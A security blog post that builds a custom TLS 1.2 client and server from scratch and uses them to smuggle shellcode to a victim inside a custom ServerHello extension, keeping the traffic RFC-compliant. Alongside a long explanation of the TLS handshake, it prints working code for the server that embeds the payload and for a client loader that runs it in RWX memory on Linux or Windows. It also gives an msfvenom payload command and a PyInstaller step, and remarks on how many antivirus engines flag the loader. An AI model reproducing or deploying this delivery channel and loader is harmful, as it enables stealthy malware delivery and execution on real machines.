Post

Exotic ways of hiding shellcode. Part 2 : TLS

Exotic ways of hiding shellcode. Part 2 : TLS

TLS is a trustworthy channel. Surely we can’t use it to distribute malware.

In this episode, we’ll be writing a custom TLS client and a server !

We will hide the shellcode in places TLS RFC ( rfc5246 ) allows, extract the shellcode using our custom client and execute it.

And the best part ? We’ll be doing all of this while keeping the traffic fully legitimate and RFC-compliant !

This post is not about how to execute the shellcode by evading defenses, it’s about how to silently deliver it.

Motivation

So why bother writing a custom TLS client and server? Honestly, I thought this would be way easier when I first came up with the idea, but it turned out to be a lot complicated than I expected. Crypto looks neat and clean in diagrams, but once you dig into the details things get chaotic fast.

I wanted to have my own TLS stack around for future work as well. Exploit development, fuzzing, or just messing with anything crypto/TLS related.

Protocols are usually built to be rock solid and reliable. Over time, they collect all sorts of extra features and little details that rarely see any use and that’s perfectly normal. That’s why, we’re still using SMB from 1983, SSH from 1995, and RDP from 1998. Their core architecture is strong enough that with just small tweaks and updates, they’ve managed to stay relevant for decades.

So for example let’s take a look at Certificate Request of TLS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
7.4.4.  Certificate Request

   When this message will be sent:

       A non-anonymous server can optionally request a certificate from
       the client, if appropriate for the selected cipher suite.  This
       message, if sent, will immediately follow the ServerKeyExchange
       message (if it is sent; otherwise, this message follows the
       server's Certificate message).

   Structure of this message:

      enum {
          rsa_sign(1), dss_sign(2), rsa_fixed_dh(3), dss_fixed_dh(4),
          rsa_ephemeral_dh_RESERVED(5), dss_ephemeral_dh_RESERVED(6),
          fortezza_dms_RESERVED(20), (255)
      } ClientCertificateType;

fortezza_dms_RESERVED ?? what is that ?

Turns out Fortezza is an encryption algorithm and it has been implemented in TLS.

It was developed for the U.S. government’s Clipper chip project and has been used by the U.S. Government in various applications

The most widely used Type 1 encryption card is the KOV-12 Fortezza card which is used extensively for the Defense Message System (DMS).

I’ve never ever heard about Fortezza DMS before but turns out there are people who use it and it is implemented in TLS.

You’ll often bump into tons of legacy features or unused tech stack when exploring protocol internals.

Idea

The idea is very simple,

  • Find a place where you can hide your shellcode reliably without ever interrupting the TLS and the data flow.
  • Hide your shellcode in that very exact location.
  • Your server serves the TLS server with the shellcode.
  • Your client talks to your server while performing the TLS connection, receives the shellcode from the server and executes it.

Coolz, let’s get into it.

Writing a TLS Client & Server from scratch

I’ll be working with TLS 1.2 here. It’s close enough to the other TLS versions that the differences don’t really get in the way.

A generic TLS flow looks like below.

image

Let me try to explain it in detail. I will use TLS_RSA_WITH_AES_128_CBC_SHA256 for this very specific blogpost.

  • Client starts the record of every handshake messages.
  • Client and server first greet each others with Hello messages. Client sends Client Hello and share the information with client
    • TLS version
    • Timestamp (they should share timestamp according to RFC but no one really cares about this field. They ignore this 4 byte value and just generate 32 bytes random value)
    • Random values
    • Available cipher suites
    • Available compression methods
    • Extensions
    • Available signature algorithms
  • Server sends Server Hello back and shares
    • Timestamp
    • Random values it just generated
    • Agreed cipher suite to be used
    • Agreed compression method
    • Extensions
  • Server sends the server Certificate to client and sends a Server Hello Done message.
  • Client sends a Client Key Exchange message to server where it,
    • Parses the server certificate, finds server’s public key.
    • Based on the aggreed cipher suite, (which server picks) calculates the pre-master secret.
    • Encrypts the pre-master secret with server’s public key (server can decrypt this with it’s private key)
  • Client sends Change Cipher Spec message (This is not an handshake message, this is another record type, 20)
  • Server and Client expand keys. Meaning,
    • They calculate master secret using pseudo_random_function that TLS RFC defines
    • They expand the master secret key block and derive keys
      • master_secret
      • client_write_MAC_key
      • server_write_MAC_key
      • client_write_key
      • server_write_key
      • client_write_IV
      • server_write_IV
    • They’ll use those keys to encrypt and decrypt data.
  • Client sends Finished,
    • Client appends every handshake messages both sent and received and gets a hashsum based on the agreed cipher.
      • Ex: handshake_hash = sha256(handshake_messages)
    • With the master secret and agreed cipher method it generates a verify_data of length 12
    • Encrypts this message itself and sends it.
      • Encryption mechanism is the agreed cipher suite.
  • Server receives Finished,
    • Decrypts Finished
    • Verifies that the verify_data client has calculated is correct. Meaning that the TLS is done correctly and there are no problems
    • Replies with server Finished.
  • Client and data can now start exchanging data with the secure channel
    • WRITE_SEQ and READ_SEQ are set to zero
      • On each read (receive) or write (send) they increment this value.
  • Client sends an Application Data,
    • Basically sends a plain text by encrypting it using the derived keys
  • Server receives the Application Data,
    • Decrypts it and it does whatever it does
  • Either one can send Alert whenever something wrong happens independent of the order

Let’s write it !

TLS Record Layer

In TLS, every message is carried inside the record layer. There are, as you can see 4 types of record types. We’ll be using the Handshake messages (plus a single ChangeCipherSpec) to set up the secure channel, and then we’ll excange data through Application Data records. The Alert record doesn’t follow the normal order and can be sent at any time.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
struct {
          uint8 major;
          uint8 minor;
      } ProtocolVersion;

enum {
  change_cipher_spec(20), alert(21), handshake(22),
  application_data(23), (255)
} ContentType;

struct {
  ContentType type;
  ProtocolVersion version;
  uint16 length;
  opaque fragment[TLSPlaintext.length];
} TLSPlaintext;

Client Hello

Client Hello and the following messages are handshake messages.

The ClientHello message includes a random structure, which is used later in the protocol.

1
2
3
4
5
    struct {
     uint32 gmt_unix_time;
     opaque random_bytes[28];
    } Random;

I found this to be funny because none of the clients really cared about 4-byte timestamp gmt_unix_time. They just ignore it and generated a 32-byte random value instead.

1
2
3
4
5
6
7
8
9
10
11
12
13
struct {
  ProtocolVersion client_version;
  Random random;
  SessionID session_id;
  CipherSuite cipher_suites<2..2^16-2>;
  CompressionMethod compression_methods<1..2^8-1>;
  select (extensions_present) {
      case false:
          struct {};
      case true:
          Extension extensions<0..2^16-1>;
  };
} ClientHello;

Server Hello

1
2
3
4
5
6
7
8
9
10
11
12
13
struct {
          ProtocolVersion server_version;
          Random random;
          SessionID session_id;
          CipherSuite cipher_suite;
          CompressionMethod compression_method;
          select (extensions_present) {
              case false:
                  struct {};
              case true:
                  Extension extensions<0..2^16-1>;
          };
      } ServerHello;

Server picks one cipher_suite client suggested and uses it.

1
2
3
4
 cipher_suite
      The single cipher suite selected by the server from the list in
      ClientHello.cipher_suites.  For resumed sessions, this field is
      the value from the state of the session being resumed.

Certificate

1
2
3
4
5
opaque ASN.1Cert<1..2^24-1>;

struct {
  ASN.1Cert certificate_list<0..2^24-1>;
} Certificate;
1
2
-  The certificate type MUST be X.509v3, unless explicitly negotiated
      otherwise (e.g., [TLSPGP]).

Server Hello Done

Hello done has no fields.

1
struct { } ServerHelloDone;

Pseudo Random Function

PRF logic is as follows,

1
PRF(secret, label, seed) = P_<hash>(secret, label + seed)

where P_hash is,

1
2
3
4
      P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                             HMAC_hash(secret, A(2) + seed) +
                             HMAC_hash(secret, A(3) + seed) + ...

I found the documentation to be slightly confusing because it doesn’t mention much about the hashing function

The code block I’ve written is cleaner for me to read,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
def pseudo_random_function(secret: bytes, label: bytes, seed: bytes, output_length: int, hash_function=hashlib.sha256) -> bytes:
    """
    section 5 of rfc 5246
    https://datatracker.ietf.org/doc/html/rfc5246#section-5

    TLS 1.2 PRF(secret, label, seed) = P_hash(secret, label + seed)
    """
    full_seed = label + seed
    return p_hash(secret, full_seed, output_length, hash_function)


def p_hash(secret: bytes, seed: bytes, output_length: int, hash_function) -> bytes:
    """
    P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                           HMAC_hash(secret, A(2) + seed) + ...
    where:
      A(0) = seed
      A(i) = HMAC_hash(secret, A(i-1))
    """
    result = bytearray()
    A = seed
    while len(result) < output_length:
        A = hmac.new(secret, A, hash_function).digest()
        result.extend(hmac.new(secret, A + seed, hash_function).digest())
    return bytes(result[:output_length])

Client Key Exchange

1
2
3
4
5
6
7
8
9
10
11
12
struct {
    select (KeyExchangeAlgorithm) {
        case rsa:
            EncryptedPreMasterSecret;
        case dhe_dss:
        case dhe_rsa:
        case dh_dss:
        case dh_rsa:
        case dh_anon:
            ClientDiffieHellmanPublic;
    } exchange_keys;
} ClientKeyExchange;

RSA-Encrypted Premaster Secret Message,

1
2
3
4
5
6
  If RSA is being used for key agreement and authentication, the
 client generates a 48-byte premaster secret, encrypts it using the
 public key from the server's certificate, and sends the result in
 an encrypted premaster secret message.  This structure is a
 variant of the ClientKeyExchange message and is not a message in
 itself.

Structure of this message:

1
2
3
4
struct {
    ProtocolVersion client_version;
    opaque random[46];
} PreMasterSecret;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
client_version
    The latest (newest) version supported by the client.  This is
    used to detect version rollback attacks.

random
    46 securely-generated random bytes.

struct {
    public-key-encrypted PreMasterSecret pre_master_secret;
} EncryptedPreMasterSecret;

pre_master_secret
    This random value is generated by the client and is used to
    generate the master secret, as specified in Section 8.1.

Key Expansion

This one is not a handshake message

Pre master secret is calculated in the in the last message, Client Key Exchange. In order to decrypt and encrypt messages, the key must be expanded and other keys must be derived.

We start by calculating master_secret first,

1
2
3
master_secret = PRF(pre_master_secret, "master secret",
                    ClientHello.random + ServerHello.random)
                    [0..47];

We expand the block with label key expansion

1
2
3
4
key_block = PRF(SecurityParameters.master_secret,
              "key expansion",
              SecurityParameters.server_random +
              SecurityParameters.client_random);

and then the block is partitioned,

1
2
3
4
5
6
        client_write_MAC_key[SecurityParameters.mac_key_length]
        server_write_MAC_key[SecurityParameters.mac_key_length]
        client_write_key[SecurityParameters.enc_key_length]
        server_write_key[SecurityParameters.enc_key_length]
        client_write_IV[SecurityParameters.fixed_iv_length]
        server_write_IV[SecurityParameters.fixed_iv_length]

Change Cipher Spec

This is not an handshake message. This is a different type of TLS record on it’s own.

1
2
3
struct {
   enum { change_cipher_spec(1), (255) } type;
} ChangeCipherSpec;

Client Finished

1
2
3
struct {
    opaque verify_data[verify_data_length];
} Finished;

Label differs based on the direction. Client uses client_finished and server uses server_finished

1
2
3
verify_data
         PRF(master_secret, finished_label, Hash(handshake_messages))
            [0..verify_data_length-1];

handshake_messages here is important. You must add every handshake messages without including the record layer header.

1
2
3
4
5
6
7
handshake_messages
    All of the data from all messages in this handshake (not
    including any HelloRequest messages) up to, but not including,
    this message.  This is only data visible at the handshake layer
    and does not include record layer headers.  This is the
    concatenation of all the Handshake structures as defined in
    Section 7.4, exchanged thus far.

Encryption Mechanism

We are using TLS_RSA_WITH_AES_128_CBC_SHA256 so the encryption and decryption mechanisms are AES in our case.

Finished message itself is encrypted.

Before sending anything encrypted, we must set READ (receive) and WRITE (send) Sequence counter in our logic.

1
2
ctx.WRITE_SEQ = 0
ctx.READ_SEQ = 0

Before sending the client finished, we must increment the WRITE_SEQ. In every request, we must increment those bytes accordingly.

We grab the keys that we’ve derived earlier,

1
2
3
key = self.ctx.KEYS['client_write_key']
iv =  self.ctx.KEYS['client_write_IV']
mac_key = self.ctx.KEYS['client_write_MAC_key']

Grab the seq number.

1
2
self.ctx.WRITE_SEQ += 1
seq_num_raw = self.ctx.WRITE_SEQ.to_bytes(8, 'big')

Compute mac, pad data and encrypt it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mac_data = (
    seq_num_raw +
    self.msg_type +
    self.ctx.TLS_VERSION_1_2 +
    len(data).to_bytes(2, 'big') +
    data
)

mac = hmac.new(mac_key, mac_data, hashlib.sha256).digest()

# mac
plaintext = data + mac

# padding 
block_size = AES.block_size
pad_len = block_size - ((len(plaintext) + 1) % block_size)
padding = bytes([pad_len] * (pad_len + 1))  # pad_len + 1 bytes
plaintext += padding

# AES encrypt - CBC
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(plaintext)

# prepend iv for further use
full_msg = iv + ciphertext
return full_msg

Server Finished

Server finished is pretty much the opposite of client finished. Only the label changes.

Instead of client_finished, server uses server_finished

Application Data

Sending application data is quite straight forward. We just build a different type of record layer. The data is encrypted based on the Cipher Suite agreed as I’ve showed above.

Alert

Alert is a different record layer on it’s own. There are predefined alert types,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
enum { warning(1), fatal(2), (255) } AlertLevel;

enum {
    close_notify(0),
    unexpected_message(10),
    bad_record_mac(20),
    decryption_failed_RESERVED(21),
    record_overflow(22),
    decompression_failure(30),
    handshake_failure(40),
    no_certificate_RESERVED(41),
    bad_certificate(42),
    unsupported_certificate(43),
    certificate_revoked(44),
    certificate_expired(45),
    certificate_unknown(46),
    illegal_parameter(47),
    unknown_ca(48),
    access_denied(49),
    decode_error(50),
    decrypt_error(51),
    export_restriction_RESERVED(60),
    protocol_version(70),
    insufficient_security(71),
    internal_error(80),
    user_canceled(90),
    no_renegotiation(100),
    unsupported_extension(110),
    (255)
} AlertDescription;

struct {
    AlertLevel level;
    AlertDescription description;
} Alert;

Alert below for example is warning and insufficient_security

1
bytes[0x01,0x47]

Let’s keep it in mind for funz.

Extensions

This is the section where we’ll get creative.

From the RFC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
7.4.1.4.  Hello Extensions

   The extension format is:

      struct {
          ExtensionType extension_type;
          opaque extension_data<0..2^16-1>;
      } Extension;

      enum {
          signature_algorithms(13), (65535)
      } ExtensionType;

   Here:

   -  "extension_type" identifies the particular extension type.

   -  "extension_data" contains information specific to the particular
      extension type.

Extension data is 2^16-1 which is 64Kb. That is more than enough space we need to place our shellcode.

We also need to pay attention to this,

1
2
3
4
5
6
7
8
9
10
11
12
13
   An extension type MUST NOT appear in the ServerHello unless the same
   extension type appeared in the corresponding ClientHello.  If a
   client receives an extension type in ServerHello that it did not
   request in the associated ClientHello, it MUST abort the handshake
   with an unsupported_extension fatal alert.

   Nonetheless, "server-oriented" extensions may be provided in the
   future within this framework.  Such an extension (say, of type x)
   would require the client to first send an extension of type x in a
   ClientHello with empty extension_data to indicate that it supports
   the extension type.  In this case, the client is offering the
   capability to understand the extension type, and the server is taking
   the client up on its offer.

We must first greet the server with our client with our extension with an empty data just so we are %100 following the RFC.

Our extension type will be 0xBEEF and the extention_data of it will be our shellcode !

If the server is started with a shellcode, it appends the custom extension to our Server Hello message.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def generate_server_hello(self):
...
    # Extensions: include secure renegotiation (RFC5746) so modern clients don't abort
    # renegotiation_info (0xff01) with zero-length renegotiated_connection for initial handshake
    reneg_ext = b"\xff\x01" + (1).to_bytes(2, 'big') + b"\x00"
    extensions = reneg_ext

    if self.ctx.SHELLCODE:
        # if shellcode is set, add custom extension
        extension_type = b"\xBE\xEF" # BEEF
        extension_data = self.ctx.SHELLCODE # placeholder
        extension_data_len = len(extension_data).to_bytes(2, 'big')
        extensions += extension_type + extension_data_len + extension_data

    extensions_len = len(extensions).to_bytes(2, 'big')

    msg = (
        version +
        random_bytes +
        session_id_len + session_id +
        self.ctx.AGGREED_CIPHER_SUITE +
        compression +
        extensions_len + extensions
    )
    length = len(msg).to_bytes(3, 'big')
    server_hello = handshake_type + length + msg
    return self.generate_tls_record(server_hello)

PoC

Without ever going into too much detail you can find the complete written PoC code in the github repo of mine,

morph3/my-tls

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/mnt/c/Users/melih/Desktop/my-tls main*
venv ❯ python3 client.py localhost 8443
...

HTTP/1.0 200 ok
Content-type: text/html

<HTML><BODY BGCOLOR="#ffffff">
<pre>

s_server -cert server.crt -key server.key -accept 8443 -www -msg -tls1_2 -state -debug -trace
Secure Renegotiation IS NOT supported
Ciphers supported in s_server binary
TLSv1.3    :TLS_AES_256_GCM_SHA384    TLSv1.3    :TLS_CHACHA20_POLY1305_SHA256
TLSv1.3    :TLS_AES_128_GCM_SHA256    TLSv1.2    :ECDHE-ECDSA-AES256-GCM-SHA384
TLSv1.2    :ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2    :DHE-RSA-AES256-GCM-SHA384
TLSv1.2    :ECDHE-ECDSA-CHACHA20-POLY1305 TLSv1.2    :ECDHE-RSA-CHACHA20-POLY1305
TLSv1.2    :DHE-RSA-CHACHA20-POLY1305 TLSv1.2    :ECDHE-ECDSA-AES128-GCM-SHA256
TLSv1.2    :ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2    :DHE-RSA-AES128-GCM-SHA256
TLSv1.2    :ECDHE-ECDSA-AES256-SHA384 TLSv1.2    :ECDHE-RSA-AES256-SHA384
TLSv1.2    :DHE-RSA-AES256-SHA256     TLSv1.2    :ECDHE-ECDSA-AES128-SHA256
TLSv1.2    :ECDHE-RSA-AES128-SHA256   TLSv1.2    :DHE-RSA-AES128-SHA256
TLSv1.0    :ECDHE-ECDSA-AES256-SHA    TLSv1.0    :ECDHE-RSA-AES256-SHA
SSLv3      :DHE-RSA-AES256-SHA        TLSv1.0    :ECDHE-ECDSA-AES128-SHA
...

Magic function,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def do_magic(ctx):
    import ctypes
    print("Doing the magic 😈")
    shellcode = bytes.fromhex(ctx.SHELLCODE.hex())
    print(f"Shellcode: {shellcode.hex()[:10]}...")
    if os.name == "posix":
        # if client is linux
        import mmap
        # Allocate RWX memory
        mem = mmap.mmap(-1, len(shellcode),
                        flags=mmap.MAP_PRIVATE | mmap.MAP_ANON,
                        prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
        # Copy shellcode into allocated memory
        mem.write(shellcode)
        # Cast memory to a function pointer
        func = ctypes.CFUNCTYPE(None)(ctypes.addressof(ctypes.c_void_p.from_buffer(mem)))
        # Call it
        func()
    else:
        # it is windows
        # extremely straight forward shellcode execution mechanism
        ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
        rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
        ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
        handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
        ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    return

As you can notice, the windows block above is EXTREMELY suspicious and it’s no surprise that 12 out of 72 engines flagged it. That’s not really the point this post is about how to the silently deliver the shellcode. The loader mechanism can vary a lot depending on your stack and how you design your workflow.

image

We can generate our shellcode using,

msfvenom -p windows/x64/exec CMD="cmd /c whoami & calc.exe" EXITFUNC=thread > shellcode.bin

Make sure to have EXITFUNC to not make the main logic crash.

And pack an exe like below,

python -m PyInstaller --onefile client.py

And enjoy !

image

Sources

This post is licensed under CC BY 4.0 by the author.